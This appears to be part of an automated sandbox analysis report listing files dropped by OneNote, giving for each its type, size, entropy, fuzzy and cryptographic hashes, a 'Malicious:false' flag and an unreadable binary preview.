                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................9.......9u|%.F.....h.<.b.....<.b...QL.0....>...9u|%.F.....h...9.<.b...QL.0....>.<.b................................9.......9...................................................9..%....9\......9N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................<.b..c..,.....................9.. ..$.................9.. ..$p..............o.z5E../.............|....L....u|y....N...^.............................................................................................................|....L....u|y............................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5232634088927651
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcoIPut2HiPqxcifbyLx8Olu3BYNYj4k6cw1EEwK:jRcpiLqxfV3BggZQElK
                                                                                                                                                                                                              MD5:0EED3015A7FE059978F658B62A638BB8
                                                                                                                                                                                                              SHA1:9A52ABCE242C9C00BA778B3A78C3A31D6617D9EA
                                                                                                                                                                                                              SHA-256:112186DDBFC0D1671CC9E34F611731F3496C6B151D0892A1B3AD2E9BB220ADD6
                                                                                                                                                                                                              SHA-512:52739086FAC9FD15CD1509FFD3660E8F7B7EDBE9AB11963F1D8F7A421A74E6FD1F9CFC30D7A0E72C9C527F913ED9EECFC397D5DEB207935C8A313174B5CBAD3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..............................................................................................................................................................................................................Z.UiC.6..P..s...........................Z.UiC.6..P..s............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p........t..n(.B.uE..n............. ....5L..C=T.a.....N...^............................................................................................................ ....5L..C=T.a.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4700439888202774
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:VyCipocUX70IRtXkpHhPxj410Jr++r/vHBfHe++Wh/SOeGvY2+IDRcQE+Qy:NTUpHhPlDzbhPmWjeG7tKSQ
                                                                                                                                                                                                              MD5:4854C7AC5B95B8BDAA040B55E4C2D01B
                                                                                                                                                                                                              SHA1:23E18EFFCB211EB22A30A79DD4361EA89DBCDBF2
                                                                                                                                                                                                              SHA-256:3D99BE9D0E0789798951FA606C4AC277F0E283E0C8470EC235C74F76901EE304
                                                                                                                                                                                                              SHA-512:F7A973472E37BA891A26C646C136E7B7DBC1C0A1D385D271B8E614A6B30017FBA7D583E6CA0107964B2297557AD1DCCDECB729D7C83E82827C7F242BF058902E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........".........................?.......................................................................................................................................................................H.......HI}..I....r..(.......(..yF.K......d..t...E..._..cId....Z.0..H..\G..O_.Z..(..yF.K......(............?.......?...................................................?....?..?..\....?..N....?..N.)..?..N.7..?..N.;............................4..1...(...(.......U.s.e.r.....................Z...c..,...................?.... ..$..........?.......?..G.p.I...xO.U..Z.......Z.0..H..\G..O.2...............................(...?....................................(....c..,...................?...?.... ..$......d.......d..t...E..._..cI.Z.......Z.0..H..\G..O_..HI}..I....r....H.?..G.p.I...xO.U.?...(..yF.K......(.......>................Z.0..H..\G..O_.........................................d....c..,...................?...?...?.... ..$.....................H..c..,...................?...?...?..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.755251361640143
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:bEAE7+frcgFll7YXWbSS1mkQ3siQEdsa:RfKmbSjkQciO
                                                                                                                                                                                                              MD5:8F6C69865F8ED62158F2923FDAD0CDA9
                                                                                                                                                                                                              SHA1:7901284670C2D94B606D79435FDB7956992698E4
                                                                                                                                                                                                              SHA-256:127D1E2B8598846760AE53F3F77BF2226618A3B68FEB0E0BDF769441FE554885
                                                                                                                                                                                                              SHA-512:157645141FBF3F3147A11A2D38386AA239BB35D4E528B54ECCC14D87B93B90C35120B2E81C94C86E241BD9FE5273AEFB0F6EAD8C9F9AB325DB2186A951AEEE1F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................h.......h...&..C.{.7...[...............L...7.F..h...&..C.{.7...[h..........L...7.F...................................h.......h...................................................h....#..h..\....h..N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,...................h.... ..$...............h.... ..$p...........SI..f..D..$.r.........^.....E.......^....N...^...........................................................................................................^.....E.......^............................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5262057840223608
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcs4RE7C+h7Bt10yIlIkyLx8Olu3gl6Oiw1EgOa:jRcscE7Cq7BtiTlVV3goVQEg9
                                                                                                                                                                                                              MD5:4E2640CF200D7F540E5445D3E2B431AC
                                                                                                                                                                                                              SHA1:75A637B88180B6DC042293353FE5C964EB8B1A53
                                                                                                                                                                                                              SHA-256:1829FE984199181652D879E52DF48934F935C5CF587E1404766C2CD8D5D00388
                                                                                                                                                                                                              SHA-512:A2C9FFDA7E73A252E378110423EAC035CC81EE22C7F6F156E3AAB06B10B107D3FF9BB11CDC478D97D29F4D705AB346CD3B12A605A1CEB83786742B8A369D97DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................b.......b....`ED.M....#........................b....`ED.M....#b....................................................b.......b...................................................b.......b..\..............................................................4..1...(...(.......1.0.3.3.................p.........xN...D..O.(.............E.r...G......Z....N...^............................................................................................................E.r...G......Z....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7679297143758639
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:D0CUREX01ZcP30cP30EXvLduseIW+01Uk1in/Ic6GPNrQEnNn:Q5v3FYp7S1U9/ILa
                                                                                                                                                                                                              MD5:195427F6CEB5E1D1214DE5A9FD5408C3
                                                                                                                                                                                                              SHA1:BB8D51A1DB0869D9630851312E0877904F355182
                                                                                                                                                                                                              SHA-256:65BFCC041FEA7EBD9E39BB3884EDEB3273D274F1C30EA79B891ECCD4B3B80666
                                                                                                                                                                                                              SHA-512:C4D3D52C1B6819A6BA9134AD03AF4294D30302E15031F6A167D5FEA2462A243A27340248F073A8F1440FA1AEBBF8E1C07E884672A67FECEB2CF8750C343F97E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................#w0.....#w0.B.\H.rc-.x..d?2.....d?2.>..G.....".pd?2.>..G.....".pd?2.#w0.B.\H.rc-.x..#w0..............................#w0.....#w0.................................................#w0..$..#w0\....#w0N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................d?2..c..,...................#w0.. ..$...............#w0.. ..$p...........=.sX.E.&3.U.F.......{..>iL...o<r.....N...^...........................................................................................................{..>iL...o<r.....................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5254148740943798
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcq4lt4724lgBjyLx8Olu3gBkGZcw1EXXK:jRcq4li24lgdV3gBsQEHK
                                                                                                                                                                                                              MD5:F1F5D1E2EFDE6BFDDB1F0B34CECE5F96
                                                                                                                                                                                                              SHA1:5D1239F9ECA87EADD308DEA58E83E88EBC430A8B
                                                                                                                                                                                                              SHA-256:4185B3437D7736DF726E0668073976FEA6D170E9D5E41FA7C33DE91DCD483776
                                                                                                                                                                                                              SHA-512:B4328E8C5AF121536639ED902545C88507B578CB8FD4C5533E0598B765D2407BCE21AB20CA1BE3DF3099D1A54C9F18DDEE3AAE3A8DC2B4ADDC6A16F5E6CBBA87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................x.......x.`$VLB......4@.........................x.`$VLB......4@.x....................................................x.......x...................................................x.......x.\..............................................................4..1...(...(.......1.0.3.3.................p.........,.h..D...../..........yv&..hRL.=..4.,.....N...^...........................................................................................................yv&..hRL.=..4.,.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6132391188893209
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:90CQHDHHN/Fn4vnBsLx88cbrMkq2Sz1salwy5G0kbcw1Eh5G0k1K:eCMnKBqnkNYqunYZcQEhYa
                                                                                                                                                                                                              MD5:654A25D65D623C7CD766620F0627E5ED
                                                                                                                                                                                                              SHA1:615388678BCD0101636D05A2F41F31E5204A063E
                                                                                                                                                                                                              SHA-256:3DED350B1AA787E77D713B4EE6A56D6B0678E52B3F6C16312F99BB990DFABD02
                                                                                                                                                                                                              SHA-512:FBDF2D0E7EBFA0561400B6A8FAEEB06923D621E7A6B8E0D2650C01B87601036FCB6586F6BE2966AA113BF605E237B675162EB5109CB7A86FEE2CE79F012964C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................G.......G..0A..J.j1..Rt.........................G..0A..J.j1..Rt.G....................................................G.......G...................................................G...."..G..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......gR...``A..;.X..-............'\.}kA.c..#.......N...^.............................................................................................................'\.}kA.c..#.......................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.8060745378676049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:EEm2MjNujMfBvy0CwvsD4GdYA147lJC2MqmQEfC2Mn:fZwAOnGdYjhJC26DC2
                                                                                                                                                                                                              MD5:8879BE36CAAAEBBA2D80C2151A1CE813
                                                                                                                                                                                                              SHA1:A26FDB112CB7DD97DBB269FB0671F6E26C83E348
                                                                                                                                                                                                              SHA-256:0BFB27719667A77D2D40ACB7844E6E97616C742B3AAF1B9EA39E0FBBFA3FE62C
                                                                                                                                                                                                              SHA-512:D0D3097195744744D6CE5B29F8E29F9B8B963ADEE47E5BADCE4E48A084799D071A1A83EBD79C09A598632836E642643DD088822F6296F77FA4AA424FD4EE9232
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................7$G.....7$G.m$J.E..yi.n.&p......&pb.OqM.FI.)...7$G.m$J.E..yi.n7$G..&pb.OqM.FI.)...&p..............................7$G.....7$G.................................................7$G..%..7$G\....7$GN."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........................&p..c..,...................7$G.. ..$...............7$G.. ..$p...........HJ..a:B...U..........jf..!.F.Z....[.....N...^............................................................................................................jf..!.F.Z....[.............................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.522849190769955
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcwlv6ivI0OvOVml/yLx8Olu32/8ezrw1E1Yzn:jRcwlv6iSvOMtV32/8GrQEen
                                                                                                                                                                                                              MD5:85C5EB0859A73D74B305792B9BEF30AB
                                                                                                                                                                                                              SHA1:5A6167F5CAD8DCFC9DC72061352AB377F3A85A57
                                                                                                                                                                                                              SHA-256:15E4682B5F9E164C21E2D8A45CFC99194CC3C2B0DD86E0B03143EDF2BDFFC4F5
                                                                                                                                                                                                              SHA-512:26D7543E773C50745332CFC96643643F638CC458D5799181FD5F73EC89017EF9D6B3F6D9B0BD4BA48629AACDEDFAE32A136BD5B2A38D3516BB16D82EED33AB8D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................r.......r...GE....8.............................r...GE....8.....r....................................................r.......r...................................................r.......r\..............................................................4..1...(...(.......1.0.3.3.................p..........I..D.(...2u..........I.(G..CB.u...M.....N...^...........................................................................................................I.(G..CB.u...M.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.47516879638469
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:os8wufAo81tgIWqEbz/epXmL+Aep9sGDj4h7brdMrnEY9GdX6mkyykyl:osoAX1/E/IXmyAI9siMPRMvs4R
                                                                                                                                                                                                              MD5:044867F713B5B3D0F033512C5088368C
                                                                                                                                                                                                              SHA1:596F0D34C0FEF9D4B96F060BA9A4F25E8BCAB400
                                                                                                                                                                                                              SHA-256:6A84FE66F47D1EED0C5962D865FA928D169BDAF428F719A55424EC568E7D890C
                                                                                                                                                                                                              SHA-512:F70EA8F553B7771999DDA00D70D56E43857764B42D13FA29DB6DE1F3D787B27817CFA03A138F0300DB34CB4EADE0F31987ADA3594DB1EFF12D67336477E6D614
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ,.Y.....,.Y.........H.,.Y.........H.,.Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............R.<.@.-.,..l.....N...^...............*...[..@..6...K.........f........................................I.qk..B.....LZ..............R.<.@.-.,..l...........R.<.@.-.,..l..........,.Y.....,.Y.....,.Y.........................................,.Yj....,.YT.]..,.Y.....,.Y..B..,.YH....,.Y..B..,.Y..>.),.Y..J...................;........4...4...4.."..............,.Y.,.Y.,.Y..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........,.Y.....,.Y....#,.Y............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.357668630062996
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:bsCiY4xpIDYTlZnDZHftUEQ2MXV9lC7Bj4NrdMrm30dXB38ApAU68snDog:bsCEp5XDZ/WEKXV9mBgRMrHpAF86Do
                                                                                                                                                                                                              MD5:D39B2F1F94577719F38D569B3D814FDA
                                                                                                                                                                                                              SHA1:AB5528A9B4C7BDE742E16C154669F5695B601AFF
                                                                                                                                                                                                              SHA-256:2B1069497CDE5161ED4D9C0A401DD1FCB7C6FD07A89F4D2A7765E436170C462E
                                                                                                                                                                                                              SHA-512:2560E388E61F5368987E7969A541F557338AD7164B50A505A1CB317C6CC2BD2DC579391BBF00FE10D9A41266D670D5C4A92193A6718FCD7A4F1F0E02DEA8C35E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.sL......sL...........F..sL...........F..sL..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............z@,....%Kns...V....N...^.................^..JF.@&/...v........H........................................I.qk..B.....LZ.............z@,....%Kns...V.........z@,....%Kns...V..........sL......sL......sL..........................................sLj.....sLT.^...sL......sL..B...sL..C...sL..>...sL..|...sL .3...................;........4...4...4.."...............sL..sL..sL..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........sL......sL....#.sL............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33032
                                                                                                                                                                                                              Entropy (8bit):2.941351060644542
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                                                                                              MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                                                                                              SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                                                                                              SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                                                                                              SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12180
                                                                                                                                                                                                              Entropy (8bit):5.318266117301791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                                                                                              MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                                                                                              SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                                                                                              SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                                                                                              SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.361216375304524
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NCsW8bjMDdtkNHPEPEczowLVGcXDc9Ms7p5VrdMriuQX15k9qHm6q/F:NCs3jMDdyVPEsAowxXA9M+lRMteh6/
                                                                                                                                                                                                              MD5:294ED9C9909F38F678018C08AA65EC37
                                                                                                                                                                                                              SHA1:CE1D6C3BA0F7B7FA7D2CB1069A4C41373ACCB51A
                                                                                                                                                                                                              SHA-256:86B02693229F2C63961C9917EFFCB1CCB9C264C590F813CFAEE7D338EABE5760
                                                                                                                                                                                                              SHA-512:FA4C2805C6A12422701924879CBD5E50412F5F0F1D01F586AA4F13FF2A0883A77CF52EFA31BA572FA637B39346E93D631B934E5743FED8519D8669FD0740E150
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............:......w.......:......w........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............w.......#O_...[]....N...^.................!..D..B...@........f........................................I.qk..B.....LZ............w.......#O_...[]........w.......#O_...[]........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2104
                                                                                                                                                                                                              Entropy (8bit):7.252780160030615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                                                                                              MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                                                                                              SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                                                                                              SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                                                                                              SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.379215742086249
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:6sDcFWbM6Ztt55dZVE2JlZuUAXgdBA9pshpyZrdMrHHpfp6FXR0DNYg:6slo6ZtzE24Xp9poURM5p6oY
                                                                                                                                                                                                              MD5:B3455F6D41707E0C2C409B9FA414B975
                                                                                                                                                                                                              SHA1:A178AE38D8FB812E9ACAEE39BE6C173702AF8410
                                                                                                                                                                                                              SHA-256:531062E31F55767A2291E49EE053A53B04E5ABBCEEF829C670C0876DCB31D1DC
                                                                                                                                                                                                              SHA-512:30DDB5AA3E15BC28CE71B55E3F1402EAFB30F3CAD27E6FEADB4F6DE02FD3960C8C37D65B3868DE2F473AFA42EF39E0C45B5246067AB3C24EA7D882CEFC5ED9C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ................ ..(.r........ ..(.r.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............Z+!9.L..D.hX6......N...^.................b._.C.4G.E3.J........f........................................I.qk..B.....LZ.............Z+!9.L..D.hX6...........Z+!9.L..D.hX6..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
